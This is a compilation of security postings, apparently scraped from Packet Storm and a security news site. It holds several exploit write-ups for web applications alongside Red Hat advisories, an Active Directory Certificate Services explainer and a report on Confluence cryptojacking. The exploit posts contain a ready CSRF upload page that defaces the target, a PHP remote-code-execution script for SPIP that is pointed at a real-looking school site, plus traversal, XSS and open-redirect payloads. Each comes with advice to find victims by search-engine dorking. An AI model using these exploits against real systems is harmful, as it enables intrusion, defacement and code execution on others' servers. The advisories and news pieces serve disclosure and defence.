Water Billing Management System version 1.0 suffers from a cross site request forgery that enables an arbitrary file upload.

    =============================================================================================================================================| # Title     : Water Billing Management System 1.0 CSRF Vulnerability                                                                      || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/wbms_1.zip                                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This HTML page is designed to remotely upload arbitrary files and modify script settings.[+] Line 33 : Set your target url[+] save payload as poc.html [+] payload : <!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Direct File Upload</title></head><body>    <h2>Direct File Upload</h2>    <form id="uploadForm">        <label for="fileInput">Select File:</label>        <input type="file" id="fileInput" name="fileInput" required><br><br>        <button type="button" onclick="uploadFile()">Upload File</button>    </form>    <script>        function uploadFile() {            const fileInput = document.getElementById('fileInput').files[0];            if (!fileInput) {                alert('Please select a file.');                return;            }            const formData = new FormData();            formData.append('name', '<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>');            formData.append('img', fileInput);            console.log("(+) Uploading file...");            fetch('http://127.0.0.1/wbms/classes/SystemSettings.php?f=update_settings', { // Replace with your upload URL                method: 'POST',                body: formData            })            .then(response => response.text())            .then(data => {                if (data === '1') {                    console.log("(+) File upload seems to have been successful!");                } else {                    console.log("(-) Oh no, the file upload seems to have failed!");                }            })            .catch(error => console.error("(-) Error during file upload:", error));        }    </script></body></html>        Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Water Billing Management System 1.0 Cross Site Request Forgery / File Upload

Red Hat Security Advisory 2024-6054-03 - Updated images are now available for Red Hat Advanced Cluster Security. The updated image includes security and bug fixes. Issues addressed include deserialization and memory exhaustion vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6054.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: ACS 4.4 enhancement and security updateAdvisory ID:        RHSA-2024:6054-03Product:            Red Hat Advanced Cluster Security for KubernetesAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6054Issue date:         2024-08-29Revision:           03CVE Names:          CVE-2024-3727====================================================================Summary: Updated images are now available for Red Hat Advanced Cluster Security(RHACS). The updated image includes security and bug fixes.Red Hat Product Security has rated this update as having a security impactof Important. A Common Vulnerability Scoring System (CVSS) base score,which gives a detailed severity rating, is available for each vulnerabilityfrom the CVE link(s) in the References section.Description:This release of RHACS 4.4.5 includes security fixes for CVE-2024-37298,CVE-2024-3727 and CVE-2024-6104. If you are using an earlier version of RHACS 4.4, you are advised to upgrade to this patch release 4.4.5.Security issues fixed:* gorilla/schema: Potential memory exhaustion attack due to sparse slice deserialization (CVE-2024-37298)* containers/image: digest type does not guarantee valid type (CVE-2024-3727)* go-retryablehttp: url might write sensitive information to log file (CVE-2024-6104)For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.Solution:CVEs:CVE-2024-3727References:https://access.redhat.com/security/updates/classification/#importanthttps://docs.openshift.com/acs/4.4/release_notes/44-release-notes.htmlhttps://bugzilla.redhat.com/show_bug.cgi?id=2274767https://bugzilla.redhat.com/show_bug.cgi?id=2294000https://bugzilla.redhat.com/show_bug.cgi?id=2295010https://issues.redhat.com/browse/ROX-25956

Red Hat Security Advisory 2024-6054-03

Webpay E-Commerce version 1.0 suffers from a directory traversal vulnerability.

    =============================================================================================================================================| # Title     : Webpay E-Commerce v1.0 Directory traversal Vulnerability                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : //bower_components/bootstrap/dist/css/../../Gemfile[+] https://www/127.0.0.1/demo/gajrajgraphics.com.np/home/bower_components/bootstrap/dist/css/../../GemfileGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Webpay E-Commerce 1.0 Directory Traversal

Red Hat Security Advisory 2024-6044-03 - Red Hat Advanced Cluster Management for Kubernetes 2.11.2 General Availability release images, which fix bugs and update container images. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6044.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Low: Red Hat Advanced Cluster Management 2.11.2 bug fixes and container updates  
Advisory ID:        RHSA-2024:6044-03  
Product:            Red Hat ACM  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6044  
Issue date:         2024-08-29  
Revision:           03  
CVE Names:          CVE-2022-25883  
====================================================================

Summary: 

Red Hat Advanced Cluster Management for Kubernetes 2.11.2 General  
Availability release images, which fix bugs and update container images.

Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE links in the References section.

Description:

Red Hat Advanced Cluster Management for Kubernetes 2.11.2 images

Red Hat Advanced Cluster Management for Kubernetes provides the  
capabilities to address common challenges that administrators and site  
reliability engineers face as they work across a range of public and  
private cloud environments. Clusters and applications are all visible and  
managed from a single console—with security policy built in.

This advisory contains the container images for Red Hat Advanced Cluster  
Management for Kubernetes, which fix several bugs. See the following  
Release Notes documentation, which will be updated shortly for this  
release, for additional details about this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/release_notes/

Security fix(es):  
CVE-2022-25883 nodejs-semver: Regular expression denial of service

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-25883

References:

https://access.redhat.com/security/updates/classification/#low  
https://issues.redhat.com/browse/ACM-12908  
https://issues.redhat.com/browse/ACM-13041

Red Hat Security Advisory 2024-6044-03

SPIP version 4.2.6 suffers from a code execution vulnerability.

    =============================================================================================================================================| # Title     : SPIP 4.2.6 PHP Code execution Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 49 : Set your target.[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass IndoushkaExploit {    private $targetUrl;    private $payload;    public function __construct($targetUrl, $payload) {        $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';        $this->payload = $this->generatePayload($payload);    }    private function generatePayload($payload) {        // توليد الحمولة مع تضمين الأمر المراد تنفيذه        return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";    }    public function exploit() {        // إعداد بيانات POST التي سيتم إرسالها إلى الهدف        $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);        // تهيئة طلب HTTP باستخدام دالة cURL        $ch = curl_init($this->targetUrl);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        // إضافة رؤوس مخصصة لتجاوز المنع        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/x-www-form-urlencoded',            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'        ]);        // تنفيذ الطلب        $response = curl_exec($ch);        // تحقق من وجود أخطاء في cURL        if (curl_errno($ch)) {            echo "cURL Error: " . curl_error($ch) . "\n";        } else {            echo "Exploit Sent! Response:\n";            echo $response;        }        curl_close($ch);    }}// مثال على الاستخدام$targetUrl = 'https://eps.enseigne.ac-lyon.fr/spip/'; // استبدل هذا بالعنوان الحقيقي$payload = 'system("pwd");'; // أوامر PHP التي تريد تنفيذها$exploit = new IndoushkaExploit($targetUrl, $payload);$exploit->exploit();Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SPIP 4.2.6 Code Execution

WordPress GetYourGuide Ticketing plugin version 1.0.6 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : WordPress GetYourGuide Ticketing plugin 1.0.6 XSS Vulnerability                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://downloads.wordpress.org/plugin/getyourguide-ticketing.1.0.6.zip                                                     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected item : <input type="text" name="partner_hash" value="<?php echo $partner_hash?>"></input>[+] Install the plugin ‘GetYourGuide Ticketing’ & activate it.[+] Navigate toward the GYG-Ticketing.[+] USe Payload : ` “><img src=x onerror=alert(1)>`[+] Go to link builder to verify the XSS pop-up.Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

WordPress GetYourGuide Ticketing 1.0.6 Cross Site Scripting

WordPress SeatReg plugin version 1.54.0 suffers from an open redirection vulnerability.

    =============================================================================================================================================| # Title     : WordPress SeatReg plugin 1.54.0 open redirection Vulnerability                                                              || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://wordpress.org/plugins/seatreg/                                                                                      |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] An Open Redirection is a vulnerability when a web application or server    uses an unvalidated user-submitted link to redirect the user to a given    website or page.[+] USe Payload : new-registration-name=dedeed&action=seatreg_create_submit&seatreg-admin-nonce=11b1308e8a&*_wp_http_referer=https://evil.com[+] POST /wp-admin/admin-post.php HTTP/1.1Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

WordPress SeatReg 1.54.0 Open Redirection

WordPress WP Event Manager plugin version 3.1.44 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : WordPress WP Event Manager plugin 3.1.44 XSS Vulnerability                                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://wordpress.org/plugins/wp-event-manager/                                                                             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Install the plugins - wp-event-manager and activate it.[+] Go to event manager —> Add New - Inside the “”Event Title” at the top, enter XSS payload “><img src=xonerror=alert(1)> and hit publish.[+] Check the newly made event’s URL /event/{id}/ , XSS will trigger.Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

WordPress WP Event Manager 3.1.44 Cross Site Scripting

The most dangerous vulnerability you’ve never heard of.
In the world of cybersecurity, vulnerabilities are discovered so often, and at such a high rate, that it can be very difficult to keep up with. Some vulnerabilities will start ringing alarm bells within your security tooling, while others are far more nuanced, but still pose an equally dangerous threat. Today, we want to discuss one of

**_The most dangerous vulnerability you've never heard of._**

In the world of cybersecurity, vulnerabilities are discovered so often, and at such a high rate, that it can be very difficult to keep up with. Some vulnerabilities will start ringing alarm bells within your security tooling, while others are far more nuanced, but still pose an equally dangerous threat. Today, we want to discuss one of these more nuanced vulnerabilities as it is likely lurking in your environment waiting to be exploited: Active Directory Certificate Services vulnerabilities.

vPenTest by Vonahi Security recently implemented an attack vector specifically designed to identify and mitigate these hidden AD CS threats. But first, let's explore why AD CS vulnerabilities are so dangerous and how they work.

****What is Active Directory Certificate Services?****

Active Directory Certificate Services ("AD CS"), as defined by Microsoft is, "a Windows Server role for issuing and managing public key infrastructure (PKI) certificates used in secure communication and authentication protocols." Some common features and services that rely on AD CS are:

*   The Windows Logon Process
*   Enterprise VPN and Wireless Networks
*   Email Encryption and Digital Signatures
*   Smart Card Authentication

As companies continue to increase the variety of technologies available within their organizations, AD CS will become more common and more necessary, especially as companies continue to host their services in the cloud. Many AWS, Azure and GCP services require certificate-based authentication to function, so it is expected that AD CS will become an increasingly prominent and required service in modern multi-cloud networks.

****Hidden hazards.****

As with all powerful tools, there is a responsibility to maintain these tools properly, as they can very often be misused without the proper safeguards. This is indeed the case with AD CS. Since AD CS is a core component of the modern Windows and Active Directory authentication and authorization framework, any vulnerabilities that exist pose a great risk to those environments. As we saw 6-7 years ago with Kerberos, and continue to see today, if key authentication infrastructure is compromised, it can be abused to great lengths. The same is the case with AD CS, if not to a greater extent.

****AD CS Attack Basics****

AD CS attacks rely on the fact that the domain trusts the Certificate Authority ("CA") server as much as it trusts its Kerberos servers and other identity servers. Think of the CA server as a gatekeeper. Just as a gatekeeper controls access to a secure area, the CA server controls the distribution and validation of certificates, ensuring that only trusted entities can gain access.

However, AD CS attacks leverage this fact in order to circumvent the need for things like passwords or encryption keys. There are four major classes of AD CS vulnerabilities:

*   ESC – This class of vulnerabilities results in some level of privilege escalation within the victim network / domain. Attackers can abuse these vulnerabilities to convert their access from a low- privileged user, to the domain administrator, with little to no effort.
*   THEFT – These vulnerabilities are present when there are not significant security controls around the client endpoint, which allow for the authentication certificates to be stolen, resulting in either privilege escalation or persistence in the environment.
*   PERSIST – As the name states, these vulnerabilities result in a situation in the network environment in which the attacker can abuse their access to a certificate in order to persist their access in an environment, without the need for a password.
*   CVE – Separate from the first three classes, these vulnerabilities are based on abusing certain known vulnerabilities within AD CS that have patches.

Critically worth noting is that, while Microsoft does track and have patches released for the AD CS vulnerabilities that have been assigned CVEs, for the majority of these vulnerabilities, Microsoft puts the onus of repair and security on the consumer, which leads to the presence of these vulnerabilities much more often.

The most dangerous of the AD CS vulnerability categories is the ESC category (ESC as in privilege escalation). These pose the greatest threat to the user's environment as they require little to no privileges, depending on the specific misconfiguration. One such misconfiguration is the ESC2 vulnerability, which occurs from a server's need to impersonate certain users under particular circumstances.

This attack allows a standard user to enroll for a certificate by impersonating them via the request's on-behalf-of field. By doing this, a standard low privileged user can pretend they are the domain administrator and request certificates, and later their NTLM hash, resulting in full compromise of the domain administrator account, and typically the whole domain. Check out the demo to see how an attacker might exploit this by using the AD CS hacking tool, Certipy.

****What should you do?****

As discussed, Microsoft does not have patches that make fixing or identifying these vulnerabilities easy for their users, so the responsibility falls on the users of AD CS to secure their own systems, which can be challenging. So, what to do?

Built by the discoverers of this vulnerability class, https://github.com/GhostPack/PSPKIAudit is a PowerShell framework designed to do a lot of the heavy lifting for you and identify any offending vulnerabilities in the AD CS configuration. However, even if you do rule out these vulnerabilities at one point in time, they may resurface alongside the addition of new tools to the environment. That's where vPenTest by Vonahi Security comes in.

vPenTest is a state-of-the-art automated penetration testing tool that takes charge of your network, performing comprehensive security assessments automatically, allowing your business to continue to focus on what matters the most for you. vPenTest has built-in detections for AD CS vulnerabilities and can demonstrate impact by exploiting the vulnerabilities in the network so you can show the relevant stakeholders why they need to care about these vulnerabilities. Check out vPenTest today!

_Credits to the SpecterOps team for their wonderful research into the subject and to ly4k for developing such an amazing tool, Certipy, to help identify these vulnerabilities._

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Breaking Down AD CS Vulnerabilities: Insights for InfoSec Professionals

Threat actors are actively exploiting a now-patched, critical security flaw impacting the Atlassian Confluence Data Center and Confluence Server to conduct illicit cryptocurrency mining on susceptible instances.
"The attacks involve threat actors that employ methods such as the deployment of shell scripts and XMRig miners, targeting of SSH endpoints, killing competing crypto mining processes,

Cryptojacking / Vulnerability

Threat actors are actively exploiting a now-patched, critical security flaw impacting the Atlassian Confluence Data Center and Confluence Server to conduct illicit cryptocurrency mining on susceptible instances.

"The attacks involve threat actors that employ methods such as the deployment of shell scripts and XMRig miners, targeting of SSH endpoints, killing competing crypto mining processes, and maintaining persistence via cron jobs," Trend Micro researcher Abdelrahman Esmail said.

The security vulnerability exploited is CVE-2023-22527, a maximum severity bug in older versions of Atlassian Confluence Data Center and Confluence Server that could allow unauthenticated attackers to achieve remote code execution. It was addressed by the Australian software company in mid-January 2024.

Trend Micro said it observed a high number of exploitation attempts against the flaw between mid-June and end of July 2024 that leveraged it to drop the XMRig miner on unpatched hosts. At least three different threat actors are said to be behind the malicious activity -

*   Launching XMRig miner via an ELF file payload using specially crafted requests

*   Using a shell script that first terminates competing cryptojacking campaigns (e.g., Kinsing), deletes all existing cron jobs, uninstalls cloud security tools from Alibaba and Tencent, and gathers system information, before setting up a new cron job that checks for command-and-control (C2) server connectivity every five minutes and launching the miner

"With its continuous exploitation by threat actors, CVE-2023-22527 presents a significant security risk to organizations worldwide," Esmail said.

"To minimize the risks and threats associated with this vulnerability, administrators should update their versions of Confluence Data Center and Confluence Server to the latest available versions as soon as possible."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#vulnerability